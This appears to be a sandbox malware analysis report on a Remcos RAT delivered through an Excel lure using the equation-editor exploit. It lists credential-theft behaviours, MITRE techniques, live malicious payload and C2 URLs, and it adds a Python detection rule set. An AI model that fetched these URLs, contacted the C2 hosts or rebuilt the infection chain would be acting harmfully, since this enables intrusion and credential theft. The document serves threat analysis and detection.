Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: ESMTPPassword 17_2_004033F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1764, type: MEMORYSTR

                Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JW
Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe 14_2_0040569A
MITRE ATT&CK Matrix

The report's matrix has one column per tactic (Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact) and fills every column with a fixed set of technique names; only the techniques carrying a signature-hit badge were actually matched for this sample. Those are listed below, with the badge text reproduced as the extraction ran it together (the report stacks several coloured per-severity count badges next to a technique, so a value such as 422 is a run of badges, not a single number). Unmatched grid entries are omitted.

Reconnaissance: no hits
Resource Development: Scripting (221)
Initial Access: no hits
Execution: Native API (11); Exploitation for Client Execution (43); Command and Scripting Interpreter (123); Service Execution (2); PowerShell (3)
Persistence: Scripting (221); DLL Side-Loading (1); Windows Service (1)
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (422)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (422)
Credential Access: OS Credential Dumping (2); Input Capture (111); Credentials in Registry (2); Credentials In Files (3)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (38); Security Software Discovery (3); Virtualization/Sandbox Evasion (21); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
Lateral Movement: no hits
Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (2); Input Capture (111); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (25); Encrypted Channel (21); Remote Access Software (1); Non-Application Layer Protocol (3); Application Layer Protocol (214)
Exfiltration: no hits
Impact: System Shutdown/Reboot (1)
Behavior Graph (ID 1500264; sample RFQ No. 109078906v.xla.xlsx; start date 28/08/2024; architecture WINDOWS; score 100)

Sample-level network: zhort.de
Sample-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 25 other signatures

Process tree as drawn in the graph (children indented under the parent that started them; network contacts, dropped files and signatures listed per node):

EXCEL.EXE
    network: zhort.de 88.99.66.38, ports 443, 49161, 49163, HETZNER-AS (DE), Germany; 107.172.31.21, ports 49162, 49169, 49170, AS-COLOCROSSING (US), United States
    dropped: C:\Users\...\~$RFQ No. 109078906v.xla.xlsx (data); sweettastedbananab...esmoothheret[1].doc (Rich)
    +-- wscript.exe
    |       signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures
    |       +-- powershell.exe
    |               signatures: Suspicious powershell command line found; Suspicious execution chain found
    |               +-- powershell.exe
    |                       network: ia803104.us.archive.org 207.241.232.154, ports 443, 49171, INTERNET-ARCHIVE (US), United States
    |                       signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
    |                       +-- RegAsm.exe
    |                               network: 2024remcmon.duckdns.org 192.210.214.9, ports 14645, 49173, 49174, AS-COLOCROSSING (US), United States (Uses dynamic DNS services); geoplugin.net 178.237.33.50, ports 49175, 80, ATOM86-AS ATOM86 (NL), Netherlands
    |                               signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Tries to steal Mail credentials (via file registry); 6 other signatures
    |                               +-- RegAsm.exe: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access); Searches for Windows Mail specific files
    |                               +-- RegAsm.exe: Tries to harvest and steal browser information (history, passwords, etc)
    |                               +-- RegAsm.exe
    |                               +-- RegAsm.exe
    +-- WINWORD.EXE
            network: zhort.de
            dropped: C:\Users\user\AppData\...\zhort.de.url (MS); C:\Users\user\AppData\Roaming\...\FoNVg0.url (MS); ~WRF{03652721-936B...4-9599756B16B0}.tmp (Composite); C:\Users\user\AppData\Local\...\FFA95D3F.doc (Rich)
            signatures: Microsoft Office launches external ms-search protocol handler (WebDAV); Office viewer loads remote template; Microsoft Office drops suspicious files
            +-- EQNEDT32.EXE
                    dropped: C:\...\sweetbuttersmoothbananaherefor.vBs (Unicode)
                    signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
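The chain the graph shows (Excel pulling a remote template into Word, Word handing an RTF to EQNEDT32.EXE, a dropped VBS run by wscript.exe, nested PowerShell fetching a payload from archive.org and injecting it into RegAsm.exe, then Remcos beaconing to a duckdns.org host after a geoplugin.net lookup) is the kind of parent/child and network pattern that host telemetry rules can flag before the RAT is fully staged. What follows is an added example written for this page, not Joe Sandbox or Sigma code: a small rule set run over constructed process-creation and network events that mirror the graph. The install paths, ports and command lines in SAMPLE_EVENTS (including the execution-policy bypass flag, which the report lists as a behaviour without showing the exact command line) are assumptions, as are the dynamic-DNS provider list and the .NET hosts other than RegAsm.exe. The graph attributes wscript.exe to EXCEL.EXE while the report's signatures attribute process starts to the equation editor; the rules cover both placements.

```python
"""Triage rules for the chain above: Office -> EQNEDT32.EXE / wscript.exe ->
PowerShell -> RegAsm.exe -> dynamic-DNS C2 plus a geolocation lookup.
Added example, not sandbox code; SAMPLE_EVENTS is constructed, not report data."""
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class Event:
    kind: str          # "process" (creation) or "network" (outbound connection)
    image: str         # path or name of the acting process
    parent: str = ""   # parent image, process events only
    cmdline: str = ""  # command line, process events only
    dest: str = ""     # destination host, network events only
    port: int = 0      # destination port, network events only


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
# .NET utilities used as hollow hosts for injected payloads. RegAsm.exe is the one
# in the report; the other two are assumed peers.
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe"}
# Assumed provider list; only duckdns.org appears in the report.
DYNDNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".ddns.net", ".hopto.org")
GEOLOOKUP_HOSTS = {"geoplugin.net"}


def basename(path: str) -> str:
    """Lower-cased image name without its directory, so rules ignore install paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def office_spawns_tool(e: Event) -> Optional[str]:
    """Office app starting the equation editor or a script host (EXCEL -> wscript here)."""
    if e.kind == "process" and basename(e.parent) in OFFICE_APPS:
        child = basename(e.image)
        if child == EQUATION_EDITOR or child in SCRIPT_HOSTS:
            return f"{basename(e.parent)} started {child}"
    return None

def equation_editor_spawns(e: Event) -> Optional[str]:
    """Any child of EQNEDT32.EXE: the CVE-2017-11882 / CVE-2018-0802 pattern."""
    if e.kind == "process" and basename(e.parent) == EQUATION_EDITOR:
        return f"EQNEDT32.EXE started {basename(e.image)} (CVE-2017-11882 / CVE-2018-0802 pattern)"
    return None

def equation_editor_network(e: Event) -> Optional[str]:
    if e.kind == "network" and basename(e.image) == EQUATION_EDITOR:
        return f"EQNEDT32.EXE connected to {e.dest}:{e.port}"
    return None

def script_host_starts_powershell(e: Event) -> Optional[str]:
    if (e.kind == "process" and basename(e.parent) in SCRIPT_HOSTS
            and basename(e.image) == "powershell.exe"):
        return f"{basename(e.parent)} started powershell.exe"
    return None

def powershell_policy_bypass(e: Event) -> Optional[str]:
    """Execution-policy bypass on the command line (whitespace normalised first)."""
    if e.kind == "process" and basename(e.image) == "powershell.exe":
        flat = " ".join(e.cmdline.lower().split())
        if "-ep bypass" in flat or "-executionpolicy bypass" in flat:
            return "powershell.exe launched with execution policy bypass"
    return None

def powershell_starts_dotnet_host(e: Event) -> Optional[str]:
    if (e.kind == "process" and basename(e.parent) == "powershell.exe"
            and basename(e.image) in DOTNET_HOSTS):
        return f"powershell.exe started {basename(e.image)} (likely injection host)"
    return None

def dynamic_dns_contact(e: Event) -> Optional[str]:
    if e.kind == "network" and e.dest.lower().endswith(DYNDNS_SUFFIXES):
        return f"{basename(e.image)} contacted dynamic-DNS host {e.dest}:{e.port}"
    return None

def geolocation_lookup(e: Event) -> Optional[str]:
    if e.kind == "network" and e.dest.lower() in GEOLOOKUP_HOSTS:
        return f"{basename(e.image)} queried {e.dest} (Remcos-style geolocation check)"
    return None


RULES: List[Callable[[Event], Optional[str]]] = [
    office_spawns_tool, equation_editor_spawns, equation_editor_network,
    script_host_starts_powershell, powershell_policy_bypass,
    powershell_starts_dotnet_host, dynamic_dns_contact, geolocation_lookup,
]

def triage(events: List[Event]) -> List[Tuple[int, str]]:
    """Apply every rule to every event; return (event index, finding) pairs in order."""
    findings: List[Tuple[int, str]] = []
    for i, e in enumerate(events):
        for rule in RULES:
            hit = rule(e)
            if hit:
                findings.append((i, hit))
    return findings


# Constructed events following the graph above. Paths, ports and the PowerShell
# command line are assumptions; the VBS path is left out because the report truncates it.
OFFICE14 = r"C:\Program Files\Microsoft Office\Office14"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    Event("process", OFFICE14 + r"\EXCEL.EXE", parent=r"C:\Windows\explorer.exe"),
    Event("process", OFFICE14 + r"\WINWORD.EXE", parent=OFFICE14 + r"\EXCEL.EXE"),
    Event("process", EQ, parent=OFFICE14 + r"\WINWORD.EXE"),
    Event("network", EQ, dest="107.172.31.21", port=80),
    Event("process", r"C:\Windows\System32\wscript.exe", parent=OFFICE14 + r"\EXCEL.EXE",
          cmdline="wscript.exe sweetbuttersmoothbananaherefor.vBs"),
    Event("process", PS, parent=r"C:\Windows\System32\wscript.exe",
          cmdline="powershell.exe -ExecutionPolicy Bypass -NoProfile -Command ..."),
    Event("network", PS, dest="ia803104.us.archive.org", port=443),
    Event("process", REGASM, parent=PS),
    Event("network", REGASM, dest="2024remcmon.duckdns.org", port=14645),
    Event("network", REGASM, dest="geoplugin.net", port=80),
    Event("process", CHROME, parent=r"C:\Windows\explorer.exe"),  # benign control, must not fire
    Event("network", CHROME, dest="www.google.com", port=443),
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx:2d}: {finding}")
```

Run as-is it prints the eight findings for the constructed chain; mapped onto real Sysmon Event ID 1 (process create) and Event ID 3 (network connect) records the same rules apply unchanged. Treat office_spawns_tool as a lower-severity indicator, since old documents still launch the equation editor legitimately, whereas equation_editor_spawns and equation_editor_network rarely have a benign explanation.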

Submitted file:
Source | Detection | Scanner | Label
RFQ No. 109078906v.xla.xlsx | 11% | ReversingLabs | -
RFQ No. 109078906v.xla.xlsx | 21% | Virustotal | -
RFQ No. 109078906v.xla.xlsx | 100% | Joe Sandbox ML | -

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc | 100% | Avira | HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc | 100% | Avira | HEUR/Rtf.Malformed
                No Antivirus matches
Domains:
Source | Detection | Scanner | Label
zhort.de | 2% | Virustotal | -
geoplugin.net | 1% | Virustotal | -
ia803104.us.archive.org | 1% | Virustotal | -
2024remcmon.duckdns.org | 16% | Virustotal | -

URLs:
Source | Detection | Scanner | Label
http://b.scorecardresearch.com/beacon.js | 0% | URL Reputation | safe
http://acdn.adnxs.com/ast/ast.js | 0% | URL Reputation | safe
http://www.imvu.comr | 0% | URL Reputation | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://support.google.com/chrome/?p=plugin_flash | 0% | URL Reputation | safe
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | 0% | URL Reputation | safe
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | 0% | URL Reputation | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | 0% | URL Reputation | safe
http://go.micros | 0% | URL Reputation | safe
http://cache.btrll.com/default/Pix-1x1.gif | 0% | URL Reputation | safe
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://o.aolcdn.com/ads/adswrappermsni.js | 0% | URL Reputation | safe
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://static.chartbeat.com/js/chartbeat.js | 0% | URL Reputation | safe
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | 100% | URL Reputation | malware
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | 0% | URL Reputation | safe
https://login.yahoo.com/config/login | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | 0% | URL Reputation | safe
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | 0% | URL Reputation | safe
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC: | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | 0% | URL Reputation | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | 0% | URL Reputation | safe
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://ia803104.us.archive.org | 0% | Avira URL Cloud | safe
https://www.ccleaner.com/go/app_cc_pro_trialkey | 0% | URL Reputation | safe
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
https://contextual.media.net/8/nrrV73987.js | 0% | URL Reputation | safe
http://www.imvu.com | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contextual.media.net/ | 0% | URL Reputation | safe
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | 0% | URL Reputation | safe
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | 0% | URL Reputation | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | 0% | URL Reputation | safe
http://cdn.at.atwola.com/_media/uac/msn.html | 0% | URL Reputation | safe
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | 0% | URL Reputation | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
https://policies.yahoo.com/w3c/p3p.xml | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://www.ebuddy.com | 0% | URL Reputation | safe
http://www.nirsoft.net | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
https://zhort.de/FoNVg0 | 0% | Avira URL Cloud | safe
http://www.imvu.com/LK | 0% | Avira URL Cloud | safe
http://107.172.31.21 | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://107.172.31.21 | 0% | Virustotal | -
http://www.nirsoft.net | 0% | Virustotal | -
https://www.google.com | 0% | Avira URL Cloud | safe
https://zhort.de/FoNVg0 | 2% | Virustotal | -
http://www.msn.com/?ocid=iehp | 0% | Avira URL Cloud | safe
http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Virustotal | -
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
http://www.msn.com/de-de/?ocid=iehp | 0% | Avira URL Cloud | safe
https://ia803104.us.archive.org | 1% | Virustotal | -
https://ia803104.us.archive.org/27/items/vbs_20240LR | 0% | Avira URL Cloud | safe
2024remcmon.duckdns.org | 100% | Avira URL Cloud | malware
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | 0% | Virustotal | -
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | 0% | Avira URL Cloud | safe
http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc | 6% | Virustotal | -
http://www.nirsoft.net/ | 0% | Virustotal | -
https://zhort.de/FoNVg0yX | 0% | Avira URL Cloud | safe
http://www.msn.com/de-de/?ocid=iehp | 0% | Virustotal | -
https://ia803104.us.archive.org/27/items/vbs_20240LR | 1% | Virustotal | -
2024remcmon.duckdns.org | 16% | Virustotal | -
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIF | 0% | Avira URL Cloud | safe
http://107.172.31.21/xampp/nbc/EVRR.txt | 0% | Avira URL Cloud | safe
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFU | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Virustotal | -
http://www.msn.com/ | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | 0% | Virustotal | -
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
https://zhort.de/ | 0% | Avira URL Cloud | safe
http://www.msn.com/advertisement.ad.js | 0% | Avira URL Cloud | safe
http://www.msn.com/?ocid=iehp | 0% | Virustotal | -
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFj | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Virustotal | -
http://www.msn.com/advertisement.ad.js | 0% | Virustotal | -
http://www.msn.com/ | 0% | Virustotal | -
https://www.google.com/accounts/servicelogin | 0% | Virustotal | -
https://zhort.de/ | 0% | Virustotal | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zhort.de | 88.99.66.38 | true | true | - | unknown
geoplugin.net | 178.237.33.50 | true | false | - | unknown
ia803104.us.archive.org | 207.241.232.154 | true | true | - | unknown
2024remcmon.duckdns.org | 192.210.214.9 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://zhort.de/FoNVg0 | false | 2% Virustotal; Avira URL Cloud: safe | unknown
http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc | true | 6% Virustotal; Avira URL Cloud: safe | unknown
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | true | URL Reputation: malware | unknown
2024remcmon.duckdns.org | true | 16% Virustotal; Avira URL Cloud: malware | unknown
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIF | true | Avira URL Cloud: safe | unknown
http://107.172.31.21/xampp/nbc/EVRR.txt | true | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://b.scorecardresearch.com/beacon.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://acdn.adnxs.com/ast/ast.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.comr | RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC: | EQNEDT32.EXE, 00000009.00000003.492215861.000000000037F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia803104.us.archive.org | powershell.exe, 0000000D.00000002.511591510.0000000002399000.00000004.00000800.00020000.00000000.sdmp | true | 1% Virustotal; Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
